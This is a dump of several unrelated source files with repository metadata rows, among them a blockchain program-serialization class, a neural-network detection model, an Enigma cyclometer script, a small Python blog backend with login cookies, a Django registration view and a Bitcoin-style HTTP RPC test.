_buf: bytes = b""
@classmethod
def parse(cls, f) -> "SerializedProgram":
length = serialized_length(f.getvalue()[f.tell() :])
return SerializedProgram.from_bytes(f.read(length))
def stream(self, f):
f.write(self._buf)
@classmethod
def from_bytes(cls, blob: bytes) -> "SerializedProgram":
ret = SerializedProgram()
ret._buf = bytes(blob)
return ret
@classmethod
def from_program(cls, p: Program) -> "SerializedProgram":
ret = SerializedProgram()
ret._buf = bytes(p)
return ret
def to_program(self) -> Program:
return Program.from_bytes(self._buf)
def uncurry(self) -> Tuple["Program", "Program"]:
return self.to_program().uncurry()
def __bytes__(self) -> bytes:
return self._buf
def __str__(self) -> str:
return bytes(self).hex()
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, str(self))
def __eq__(self, other) -> bool:
if not isinstance(other, SerializedProgram):
return False
return self._buf == other._buf
def __ne__(self, other) -> bool:
if not isinstance(other, SerializedProgram):
return True
return self._buf != other._buf
def get_tree_hash(self, *args: List[bytes32]) -> bytes32:
"""
Any values in `args` that appear in the tree
are presumed to have been hashed already.
"""
tmp = sexp_from_stream(io.BytesIO(self._buf), SExp.to)
return _tree_hash(tmp, set(args))
def run_safe_with_cost(self, max_cost: int, *args) -> Tuple[int, Program]:
return self._run(max_cost, STRICT_MODE, *args)
def run_with_cost(self, max_cost: int, *args) -> Tuple[int, Program]:
return self._run(max_cost, 0, *args)
def _run(self, max_cost: int, flags, *args) -> Tuple[int, Program]:
# when multiple arguments are passed, concatenate them into a serialized
# buffer. Some arguments may already be in serialized form (e.g.
# SerializedProgram) so we don't want to de-serialize those just to
# serialize them back again. This is handled by _serialize()
serialized_args = b""
if len(args) > 1:
# when we have more than one argument, serialize them into a list
for a in args:
serialized_args += b"\xff"
serialized_args += _serialize(a)
serialized_args += b"\x80"
else:
serialized_args += _serialize(args[0])
# TODO: move this ugly magic into `clvm` "dialects"
native_opcode_names_by_opcode = dict(
("op_%s" % OP_REWRITE.get(k, k), op) for op, k in KEYWORD_FROM_ATOM.items() if k not in "qa."
)
cost, ret = deserialize_and_run_program2(
self._buf,
serialized_args,
KEYWORD_TO_ATOM["q"][0],
KEYWORD_TO_ATOM["a"][0],
native_opcode_names_by_opcode,
max_cost,
flags,
)
return cost, Program.to(ret)
NIL = Program.from_bytes(b"\x80")
|
[
"87711356+Olive-blockchain@users.noreply.github.com"
] |
87711356+Olive-blockchain@users.noreply.github.com
|
3d581b4a840d64ec73781edb5491e2a20ac0e61d
|
60221cc1f22bfb151c2307c7c470fe4203269e2f
|
/10-10-20/LongestVowelChain.py
|
73d7634808608bad0f4ca148b4e16ba092d93aca
|
[] |
no_license
|
christopherc1331/CodeChallenges
|
0372b34154849030dc0e7cd74f0dc94153551802
|
36ba3cad00590c914eb5a339c0fe04618d18aceb
|
refs/heads/main
| 2023-01-13T21:55:49.248348
| 2020-11-21T20:10:35
| 2020-11-21T20:10:35
| 302,963,021
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
def solve(s):
vowels = {"a": 0, "e":0, "i": 0, "o": 0, "u": 0}
largest = [0]
for i in range(len(s)):
char = s[i]
if (char in vowels):
largest[-1] += 1
else:
largest.append(0)
return max(largest)
|
[
"christopherc1331@gmail.com"
] |
christopherc1331@gmail.com
|
35c6020ad2088012abb9e86e532fb6d67f24ff18
|
37b8c1d533f6407848d0f0ef9ac78ee4b206efd9
|
/backend_test/models/payload.py
|
e6b474368ab0e9f0b528cde75746b6593e78bccb
|
[] |
no_license
|
richoGtz23/backend_test
|
2c8579c935ae6076306a3bf2b1a4c2bdb517f45d
|
8a3bebdae7145f54ac73c29795169cbe4d6fc664
|
refs/heads/master
| 2023-04-18T01:20:52.449642
| 2021-04-29T21:39:28
| 2021-04-29T21:39:28
| 362,954,076
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
from dataclasses import dataclass
@dataclass
class Payload:
status: str
num_in_english: str
|
[
"richo@gavelytics.com"
] |
richo@gavelytics.com
|
be6fe54d524ead59fa1c27ff98cd92919e15d863
|
40b69f48b0aad6fb1fde23b41f34d000236b3136
|
/ppdet/modeling/architectures/rfp_centernet.py
|
15f29a867d13e9848138a3830a485ffd6a2db57d
|
[
"Apache-2.0"
] |
permissive
|
TrendingTechnology/AFSM
|
e88d36d757229dc1266a0ec62d61fd6e48d29649
|
54af2f072071779789ba0baa4e4270a1403fd0dd
|
refs/heads/master
| 2023-01-22T03:28:17.868009
| 2020-12-10T09:47:17
| 2020-12-10T09:47:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,006
|
py
|
# AUTHOR: Zehui Gong
# DATE: 2020/6/21
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from paddle import fluid
from paddle.fluid.param_attr import ParamAttr
from paddle.fluid.initializer import Xavier, Constant
from ppdet.core.workspace import register
from ppdet.utils.check import check_version
from .centernet import CenterNet
__all__ = ['RFPCenterNet']
class ASPP(object):
def __init__(self, out_channels):
super(ASPP, self).__init__()
self.out_channels = out_channels
self.kernel_sizes = [1, 3, 3, 1]
self.dilations = [1, 3, 6, 1]
self.paddinds = [0, 3, 6, 0]
self.aspp_num = len(self.kernel_sizes)
def __call__(self, x, name=''):
avg_x = fluid.layers.adaptive_pool2d(x, 1, pool_type="avg", name=name + 'aspp_ada_gap')
outs = []
for idx in range(self.aspp_num):
inp = avg_x if (idx == self.aspp_num - 1) else x
out = fluid.layers.conv2d(
inp,
self.out_channels,
filter_size=self.kernel_sizes[idx],
stride=1,
padding=self.paddinds[idx],
dilation=self.dilations[idx],
param_attr=ParamAttr(name=name + 'aspp_conv{}.w'.format(idx)),
bias_attr=ParamAttr(initializer=Constant(0),
name=name + 'aspp_conv{}.b'.format(idx)),
act='relu',
name=name + 'aspp_conv{}'.format(idx))
outs.append(out)
outs[-1] = fluid.layers.expand(outs[-1], [1, 1, outs[0].shape[2], outs[0].shape[3]])
out = fluid.layers.concat(outs, axis=1)
return out
@register
class RFPCenterNet(CenterNet):
"""Recursive feature pyramid. details in https://arxiv.org/abs/2006.02334.
Args:
single_scale (bool): a flag that represents whether use single scale feature (e.g., level3)
or multi-scale feature fusion (fuse features across various resolutions) to predict
the final heatmap and size.
"""
def __init__(self,
backbone,
neck=None,
head='CenterHead',
rfp_steps=2,
fpn_levels=(),
stage_with_rfp=[3, 4, 5],
rfp_sharing=False,
num_classes=80,
single_scale=True):
check_version('1.8.0')
assert neck is not None, 'in recursive feature pyramid, you must have a fpn neck!'
super(RFPCenterNet, self).__init__(
backbone,
neck,
head,
num_classes,
single_scale)
fpnidx_list = list(range(fpn_levels[1], fpn_levels[0]-1, -1))
self.stage2fpnidx = {stage: fpnidx_list.index(stage) for stage in stage_with_rfp}
self.rfp_steps = rfp_steps
self.rfp_sharing = rfp_sharing
self.stage_with_rfp = stage_with_rfp
self.rfp_aspp = ASPP(neck.num_chan // 4)
def extract_feat(self, x):
input_w = x.shape[-1]
# step 1
self.backbone.prefix_name = ''
body_feats = self.backbone(x)
body_feats, _ = self.neck.get_output(body_feats)
body_feats = tuple(body_feats.values())
# feedback connection (recursive refinement)
for rfp_idx in range(self.rfp_steps - 1):
rfp_feats = tuple(self.rfp_aspp(body_feats[self.stage2fpnidx[i]])
for i in range(2, 6) if i in self.stage_with_rfp)
if self.rfp_sharing: # sharing backbone parameters
body_feats_idx = self.backbone(x, rfp_feats)
else:
self.backbone.prefix_name = 'rfp_step{}'.format(rfp_idx + 1)
body_feats_idx = self.backbone(x, rfp_feats)
body_feats_idx, _ = self.neck.get_output(body_feats_idx)
body_feats_idx = tuple(body_feats_idx.values())
body_feats_new = []
# feature fusion, fuse features from
for ft_idx in range(len(body_feats_idx)):
add_weight = self.rfp_weight(body_feats_idx[ft_idx])
body_feats_new.append(add_weight * body_feats_idx[ft_idx] +
(1-add_weight) * body_feats[ft_idx])
body_feats = body_feats_new
body_feats = self.fuse_features(body_feats, input_w)
return body_feats
def rfp_weight(self, feat, name=''):
add_weight = fluid.layers.conv2d(
feat,
1,
filter_size=1,
stride=1,
padding=0,
param_attr=ParamAttr(
initializer=Constant(0),
name=name + 'rfp_weight.w'),
bias_attr=ParamAttr(
initializer=Constant(0),
name=name + 'rfp_weight.b'),
name=name + 'rfp_weight')
add_weight = fluid.layers.sigmoid(add_weight)
return add_weight
|
[
"zehuigong@foxmail.com"
] |
zehuigong@foxmail.com
|
bdbb607631f4655a4262cb8fb9fa30bf330b8670
|
a0331cfd563fe7df25d47e6fc0fc30d2785b504e
|
/bin/cyclometer.py
|
305a84eb0d30517a83dc01fad4e6c7fef42bba8d
|
[] |
no_license
|
thorikawa/PyEnigma
|
d051c293e2909e000fbca2d60bb4b2684884a437
|
def3cfd7189dda3c4f30be764fa9ccfba7567c6e
|
refs/heads/master
| 2021-01-01T16:55:30.784125
| 2015-03-27T06:14:03
| 2015-03-27T06:14:03
| 30,911,768
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,456
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import pyenigma, string
from itertools import permutations, product
from unionfind import UnionFind
plugboard = pyenigma.Plugboard('')
for order in permutations(range(3)):
print order
rotors = [pyenigma.ROTORS[order[0]], pyenigma.ROTORS[order[1]], pyenigma.ROTORS[order[2]]]
enigma = pyenigma.Enigma(rotors, pyenigma.REFLECTOR_B, plugboard)
for ground in product(string.ascii_uppercase, repeat=3):
# groundstr = ''.join(ground)
# if groundstr != 'FUQ':
# continue
uf1 = UnionFind(list(string.ascii_uppercase))
uf2 = UnionFind(list(string.ascii_uppercase))
uf3 = UnionFind(list(string.ascii_uppercase))
for c in string.ascii_uppercase:
enigma.setWindowCharacters(ground)
result = ''
for x in range(6):
result += enigma.encode(c)
indices = [ord(x) - ord('A') for x in result]
uf1.union(indices[0], indices[3])
uf2.union(indices[1], indices[4])
uf3.union(indices[2], indices[5])
# print uf1.dump()
# print uf2.dump()
# print uf3.dump()
counts1 = uf1.counts()
counts2 = uf2.counts()
counts3 = uf3.counts()
# char1 = [len(counts1), counts1[0]]
# char2 = [len(counts2), counts2[0]]
# char3 = [len(counts3), counts3[0]]
char1 = [len(counts1)] + counts1
char2 = [len(counts2)] + counts2
char3 = [len(counts3)] + counts3
char = char1 + char2 + char3
charstring = ' '.join([str(x) for x in char])
print '%s %s' % (''.join(ground), charstring)
|
[
"horikawa.takahiro@gmail.com"
] |
horikawa.takahiro@gmail.com
|
956e59a1d186f7ae0f6f6ce9ba95e91bf7134649
|
dac996032dddd7f69de203c42eaf656dbc2419e3
|
/www/day7_handlers.py
|
e4a52714374aea6a17db24e4c38f3dcde5c63dcc
|
[] |
no_license
|
goushan33/First-python3-webapp
|
14116ce093001cba38bbb038b9bcd89c9483ddf8
|
70134eee96317c32e989b21c2788251d13d3e96e
|
refs/heads/master
| 2020-04-04T18:20:52.327584
| 2019-04-10T03:54:39
| 2019-04-10T03:54:39
| 156,159,976
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,394
|
py
|
import re
import logging
import time
import json
from day5_web_frame import get, post
from aiohttp import web
from day4_models import User, Comment, Blog, next_id
from day5_error_api import APIError,APIValueError
import hashlib
from day6_config import configs
import day6_config
import day3_orm
'''
@get('/')
async def index(request):
users =await User.findAll()
return {
'__template__': 'test.html',
'users': users
}
'''
@get('/')
async def index(request):
cookie_str = request.cookies.get(COOKIE_NAME)
print(cookie_str)
user = ''
summary = 'used for test summary1'
blogs = [Blog(id='1', name='blog1', summary=summary, created_at=time.time() - 120),
Blog(id='2', name='blog2', summary=summary, created_at=time.time() - 3600),
Blog(id='3', name='blog3', summary=summary, created_at=time.time() - 7200)]
if cookie_str:
if 'deleted' in cookie_str:
user = ''
else:
user = await cookiestr2user(cookie_str)
return {
'__template__': 'blogs.html',
'blogs': blogs,
#'__user__': request.__user__
}
@get('/api/users')
async def api_get_users():
users=await User.find_all(orderBy='created_at')
for u in users:
pass
return dict(users=users)
_RE_EMAIL = re.compile(r'^[a-z0-9\.\-\_]+\@[a-z0-9\-\_]+(\.[a-z0-9\-\_]+){1,4}$')
_RE_SHA1 = re.compile(r'^[0-9a-f]{40}$')
COOKIE_NAME = 'awesession'
_COOKIE_KEY = configs.session.secret#默认awesome
@get('/register')
async def register():
return {
'__template__': 'register.html'
}
def user2cookiestr(user,max_life):
#Generate cookie str by user
expires=str(int(time.time()+max_life))
s='%s-%s-%s-%s'%(user.id,user.passwd,expires,_COOKIE_KEY)
L = [user.id, expires, hashlib.sha1(s.encode('utf-8')).hexdigest()]
return '-'.join(L)
#提交注册信息
@post('/api/user/register')
async def api_register_user(*, email, name, passwd):
'''
通过验证邮箱进行唯一注册
用户注册时输入的密码是通过sha1计算后的40位hash字符串,服务器也不会知道原始密码明文;
用户头像是从gravatar网站抓取
'''
if not name or not name.strip():
raise APIValueError('name')
if not email or not _RE_EMAIL.match(email):
raise APIValueError('email')
if not passwd or not _RE_SHA1.match(passwd):
raise APIValueError('passwd')
users = await User.findAll(email=email)
if len(users) > 0:
raise APIError('register:failed', 'email', 'Email is already in use.')
uid = next_id()
sha1_passwd = '%s:%s' % (name, passwd)
user = User(id=uid, name=name.strip(), email=email, passwd=hashlib.sha1(sha1_passwd.encode('utf-8')).hexdigest(), image='http://www.gravatar.com/avatar/%s?d=mm&s=120' % hashlib.md5(email.encode('utf-8')).hexdigest())
await user.save()
# make session cookie:
r = web.Response()
r.set_cookie(COOKIE_NAME, user2cookiestr(user, 86400), max_age=86400, httponly=True)#86400s=24h
user.passwd = '******'#返回的是cookie,所以把passwd用*代替
r.content_type = 'application/json'
r.body = json.dumps(user, ensure_ascii=False).encode('utf-8')
return r
#登陆
@get('/signin')
async def signin():
return {
'__template__': 'signin.html'
}
#提交登陆信息
@post('/api/user/authentication')
async def user_authentication(*,email,passwd):
if not email:
raise APIValueError('email', 'Invalid email.')
if not passwd:
raise APIValueError('passwd', 'Invalid null password.')
user= await User.findAll(email=email)
if len(user) == 0:
raise APIError('signin:failed', 'no such email exist')
user=user[0]#turn a list to a dict
user=day6_config.toDict(user)# a dict to a special Dict
input_passwd = '%s:%s' % (user.name, passwd)
input_hash_passwd=hashlib.sha1(input_passwd.encode('utf-8')).hexdigest()
db_passwd=user.passwd
if input_hash_passwd!=db_passwd:
raise APIValueError('passwd', 'Invalid password.')
# authenticate ok, set cookie:
r = web.Response()
r.set_cookie(COOKIE_NAME, user2cookiestr(user, 86400), max_age=86400, httponly=True)
user.passwd = '******'
r.content_type = 'application/json'
r.body = json.dumps(user, ensure_ascii=False).encode('utf-8')
return r
#解密cookie,显示当前登陆的用户
async def cookiestr2user(cookiestr):
if not cookiestr:
return None
try:
L=cookiestr.split('-')
if len(L)!=3:
return None
uid, expires, hashed_s=L
if int(expires)<time.time():
return None
user = await User.find(uid)#按主键查找
if user is None:
return None
s = '%s-%s-%s-%s' % (uid, user.passwd, expires, _COOKIE_KEY)
if hashed_s!= hashlib.sha1(s.encode('utf-8')).hexdigest():
logging.info('the hashed_s from cookie is invaild')
return None
user.passwd = '******'
return user
except Exception as e:
logging.exception(e)
return None
#退出登陆
@get('/signout')
async def signout(request):
referer = request.headers.get('Referer')
r = web.HTTPFound(referer or '/')
r.set_cookie(COOKIE_NAME, '-deleted-', max_age=0, httponly=True)
logging.info('user signed out.')
return r
|
[
"443568347@qq.com"
] |
443568347@qq.com
|
017f38ce5694539ccdeb3137e5e3432cbac2a6fc
|
5b5d8971b01daa6bc377cfecfbbceffc1ce8fc5a
|
/codex.py
|
c3ac791d2de1a423577d34132cf8b2e28fa29859
|
[] |
no_license
|
Arcanist13/LinearCode
|
63da0208db0b48d80a22f6787fd74b93c569bbf7
|
b760282a58144a7a2b9588d43749d75d0d9ce091
|
refs/heads/master
| 2021-01-22T09:09:07.792866
| 2013-03-19T01:11:52
| 2013-03-19T01:11:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
#Takes codex and converts to a transition factor
def LinExt(codex):
ListCode = list(codex)
if len(ListCode) != 7:
return False
elif len(ListCode) == 7:
pass
op = 0
if ListCode[1] == 'a':
op = ''
elif ListCode[1] == 's':
op = '-'
else:
return False
tranTemp = op + str(ListCode[2]) + str(ListCode[5])
tran = int(tranTemp)
return tran
|
[
"gmeredith15855@gmail.com"
] |
gmeredith15855@gmail.com
|
9280c1e0b22b6cfed9287cfd7cc90a191f92fe67
|
adca754d684b9d5b7d0cbabaeef004fb7bcdb7a2
|
/djangoproject/users/views.py
|
6fad46a6f610e0e973549b1f6a4992ca2f02a7fd
|
[] |
no_license
|
qehremanekber/djangoproject
|
d9d99daa0921b2fadc69a2c2a419b261a8ec9dc7
|
009d262d3f12b54b35660b252af1511c303f1605
|
refs/heads/master
| 2023-06-16T16:44:17.298658
| 2021-07-11T22:41:11
| 2021-07-11T22:41:11
| 383,126,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 953
|
py
|
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
messages.success(request, f'Your account has been created! You are now able to log in ')
return redirect('login')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
u_form = UserUpdateForm()
p_form = ProfileUpdateForm()
context = {
'u_form': u_form,
'p_form': p_form
}
return render(request, 'users/profile.html')
|
[
"74054688+Bakubus@users.noreply.github.com"
] |
74054688+Bakubus@users.noreply.github.com
|
f061077aa9a0451acba6d155088c01013954d4bd
|
889fbe235b4c1d8c2d5860e29fd307ba1196292d
|
/workers/models.py
|
4157b0761cc32ef302ceeabecb2791a2095b1d34
|
[] |
no_license
|
DanikNik/exam_sgn
|
4b20b8739b0141e441ee261fcdc0e64b94ee35a8
|
2a01a08d9912647091fec76e3da8aec6e6717e48
|
refs/heads/master
| 2020-04-15T20:52:17.844581
| 2019-01-10T07:22:53
| 2019-01-10T07:22:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 318
|
py
|
from django.db import models
# Create your models here.
class Worker(models.Model):
first_name = models.CharField(max_length=20)
second_name = models.CharField(max_length=20)
surname = models.CharField(max_length=20)
position = models.CharField(max_length=50)
experience = models.IntegerField()
|
[
"sway9009"
] |
sway9009
|
f3c3fa48c5fe2cedcbc0edc3f040e3dde77e03bd
|
52cea26360f52b403df343c18f0d63c97f51a4ce
|
/33Search_in_Rotated_Sorted_Array.py
|
c8772589bd4411864f4b1c459c4b9eb73bd0269a
|
[] |
no_license
|
wopeter/leetcode
|
2a5f0debd47438da469cb31509cae24618f633dc
|
ae3e459da5ad923db303ac5b36a5ec69c43be073
|
refs/heads/master
| 2021-04-06T01:59:46.070202
| 2018-11-30T16:14:16
| 2018-11-30T16:14:16
| 124,897,207
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,956
|
py
|
"""
NO 33.Search in Rotated Sorted Array
Description
Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.
(i.e., [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]).
You are given a target value to search. If found in the array return its index, otherwise return -1.
You may assume no duplicate exists in the array.
Your algorithm's runtime complexity must be in the order of O(log n).
Example 1:
Input: nums = [4,5,6,7,0,1,2], target = 0
Output: 4
Example 2:
Input: nums = [4,5,6,7,0,1,2], target = 3
Output: -1
"""
class Solution:
def search(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype:int
"""
if nums == []:
return -1
left, right = 0, len(nums) - 1
while left < right:
middle = (left + right) // 2
if nums[middle] >= nums[0]:
left = middle + 1
else:
right = middle - 1
if nums[left] < nums[0]:
left, right = 0, left
while left <= right:
middle = (left + right) // 2
if nums[middle] > target:
right = middle - 1
elif nums[middle] < target:
left += 1
else:
return middle
return -1
def search2(self, nums, target):
left, right = 0, len(nums) - 1
while left <= right:
mid = (left + right) // 2
if nums[mid] == target:
return mid
elif nums[mid] >= nums[left]:
if nums[left] <= target < nums[mid]:
right = mid - 1
else:
left = mid + 1
else:
if nums[mid] < target <= nums[right]:
left = mid + 1
else:
right = mid - 1
return -1
|
[
"pengtemail@163.com"
] |
pengtemail@163.com
|
849f9e649cd5ddd741d07deaa01706c6fb2a496b
|
0623e353e9b1f073b955549d8a9e6be746428e79
|
/hw9.cgi
|
94aa861b79b7697670a7f7737345762d5a1f473e
|
[] |
no_license
|
ChristianFMartin/I211
|
d186d63711c7fd501bf06d8b8f6739921fe9eb83
|
4c31fe9b8aaf805aa5b9f9aeea95ed83395f55d0
|
refs/heads/master
| 2020-04-20T10:52:35.870327
| 2019-02-02T06:27:04
| 2019-02-02T06:27:04
| 168,801,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 639
|
cgi
|
#! /usr/bin/env python3
import cgi
print('Content-type: text/html\n')
form = cgi.FieldStorage()
item = form.getfirst('item','unknown item')
cost = form.getfirst('cost',0)
dev_m = form.getfirst('dev_m',10)
total_cost = int(cost)+int(dev_m)
total_cost = str(total_cost)
html = """
<!doctype html>
<html>
<head><meta charset="utf-8">
<title>Robot Delivery System Confirmation</title></head>
<body>
<h1>Robot Delivery System Confirmation</h1>
<p>You have selected to have a <em>{0}</em> delivered by drone.</p>
<p>Your total comes to ${1}</p>
</body>
</html>"""
print(html.format(item,total_cost))
|
[
"noreply@github.com"
] |
ChristianFMartin.noreply@github.com
|
f73bfd18d81aa0b7817cee20e527dd988d063dc3
|
5740921ce1ba85d5a31e10b58028ff8f3184aff9
|
/proj2.py
|
8ac869089732087cbdd2691673f8d6f5f24fb152
|
[] |
no_license
|
mskobe/IR-Proj2
|
5db9323261438c968392ada168a508afec393896
|
46132aa2e1aaa89f7c9349c3806ac3e157c9f161
|
refs/heads/master
| 2020-05-20T04:55:47.928240
| 2013-11-12T22:23:23
| 2013-11-12T22:23:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,255
|
py
|
import subprocess
import requests
import re
global queries
def get_query():
f = open('desc.51-100.short', 'r')
queries = []
for line in f:
line = line.strip(' .\n')
if line == '':
pass
else:
query = parse_query(line)
queries.append(query)
f.close()
return queries
def parse_query(line):
query = line.split(' ')
temp = []
for i in range(1, len(query)):
if query[i] == '' or query[i] == 'Document':
pass
elif query[i].find('-') != -1:
query[i] = parse_helper(query[i])
remove_hyphen = query[i].split('-')
for i in remove_hyphen:
i = i.lower()
temp.append(i)
elif query[i].find('\'') != -1:
query[i] = parse_helper(query[i])
remove_quote = query[i].split('\'')
for i in remove_quote:
i = i.lower()
temp.append(i)
else:
query[i] = parse_helper(query[i])
query[i] = query[i].lower()
temp.append(query[i])
return temp
def parse_helper(ele):
ele = ele.strip(',""()')
ele = ele.replace('.', '')
return ele
def stopping(query):
f = open('stoplist.txt', 'r')
stop_list = []
for line in f:
line = line.rstrip('\n')
stop_list.append(line)
for i in stop_list:
for j in range(0, len(query)):
temp_query = []
for k in range(0, len(query[j])):
if i == query[j][k]:
pass
else:
temp_query.append(query[j][k])
query[j] = temp_query
f.close()
return query
def stemming(query):
query_length = 0
#file_address = ' ~/Dropbox/homework/IR-PROJ2/stem-classes.lst'
file_address = 'stem-classes.lst'
for i in range(0, len(query)):
query_length += len(query[i])
for j in range(0, len(query[i])):
grep_cmd = 'grep -w ' + query[i][j] + file_address
process = subprocess.Popen(\
grep_cmd, stdout=subprocess.PIPE, shell=True)
temp = process.communicate()[0]
if temp != '':
stem = temp.split('|')
query[i][j] = stem[0].strip()
else:
pass
print query[i]
avg_query_len = float(query_length) / 25
print avg_query_len
return query, avg_query_len
def send_request(query, avg_query_len):
f = open('requests_url', 'w')
avg_doclen = get_avg_doclen(3)
for i in range(0, len(query)):
score = {}
query_length = len(query[i])
for j in range(1, len(query[i])):
#make_url = 'http://fiji4.ccs.neu.edu/~zerg/lemurcgi/lemur.cgi?d=3&g=p'
make_url = 'http://10.0.0.176/~zerg/lemurcgi/lemur.cgi?d=3&g=p'
make_url += '&v=' + query[i][j]
f.write(make_url)
f.write('\n')
r = requests.get(make_url)
html = r.text
parsed_html = re.compile(r'.*?<BODY>(.*?)<HR>', re.DOTALL).match(html).group(1)
numbers = re.compile(r'(\d+)', re.DOTALL).findall(parsed_html)
#numbers = parse_html(html)
ctf, df = float(numbers[0]), float(numbers[1])
inverted_list = map(lambda i: (int(numbers[2 + 3*i]), \
float(numbers[3 + 3*i]),\
float(numbers[4 + 3*i]))\
,range(0, (len(numbers) - 2)/3))
#print "ctf= %(ctf)f df= %(df)f" % {'ctf': ctf, 'df':df}
for (docid,doclen,tf) in inverted_list:
if docid in score:
score[docid] += cal_socre(doclen, tf, avg_doclen) * \
cal_query_oktf(query_length, tf, avg_query_len)
else:
score[docid] = cal_socre(doclen, tf, avg_doclen) * \
cal_query_oktf(query_length, tf, avg_query_len)
sorted_score = sorted(score.iteritems(), key=lambda d:d[1], reverse=True)
print sorted_score
f.close()
#def parse_html(html):
#parsed_html = re.compile(r'.*?<BODY>(.*?)<HR>', re.DOTALL).match(html).group(1)
#numbers = re.compile(r'(\d+)', re.DOTALL).findall(parsed_html)
#return numbers
def get_avg_doclen(database_num):
url = 'http://fiji4.ccs.neu.edu/~zerg/lemurcgi/lemur.cgi?d=?'
r = requests.get(url)
html = r.text
parsed_html = re.compile(r'.*?<BODY>(.*?)<HR>', re.DOTALL).match(html).group(1)
numbers = re.compile(r'(\d+)', re.DOTALL).findall(parsed_html)
#numbers = parse_html(html)
avg_doclen = numbers[5*(database_num-1)+4]
return avg_doclen
def cal_socre(doclen, tf, avg_doclen):
score = float(tf) / (tf+ 0.5 + 1.5*doclen/avg_doclen)
return score
def cal_query_oktf(query_length, tf, avg_query_len):
query_oktf = float(tf) / (tf + 0.5 + 1.5*query_length/avg_query_len)
return query_oktf
queries = get_query()
queries_after_stopping = stopping(queries)
queries_after_stemming, avg_query_len = stemming(queries_after_stopping)
send_request(queries_after_stemming, avg_query_len)
|
[
"douzongkun@gmail.com"
] |
douzongkun@gmail.com
|
2f521abc69b5e0850c15f9b1f908874de923fb8d
|
2542de653005fc353ec04539eb2e59821e9fc220
|
/test/functional/interface_http.py
|
94d3ee588e6322fdb6f941d3d965f2c067be3fc0
|
[
"MIT"
] |
permissive
|
wazzlecoin/wazzle
|
cb23d17a0cd252ba7770efdcde755f76386a2b85
|
661cd73a1f9eaae1e91a3fb83dc29f4d78f5b980
|
refs/heads/master
| 2021-05-17T17:05:21.597875
| 2020-05-04T15:01:35
| 2020-05-04T15:01:35
| 250,886,396
| 3
| 4
|
MIT
| 2020-03-29T09:12:18
| 2020-03-28T20:23:31
|
C++
|
UTF-8
|
Python
| false
| false
| 4,834
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Wazzle Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import WazzleTestFramework
from test_framework.util import assert_equal, str_to_b64str
import http.client
import urllib.parse
class HTTPBasicsTest (WazzleTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1 #must also response with a correct json-rpc message
assert conn.sock is not None #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1 #must also response with a correct json-rpc message
assert conn.sock is not None #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is None #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
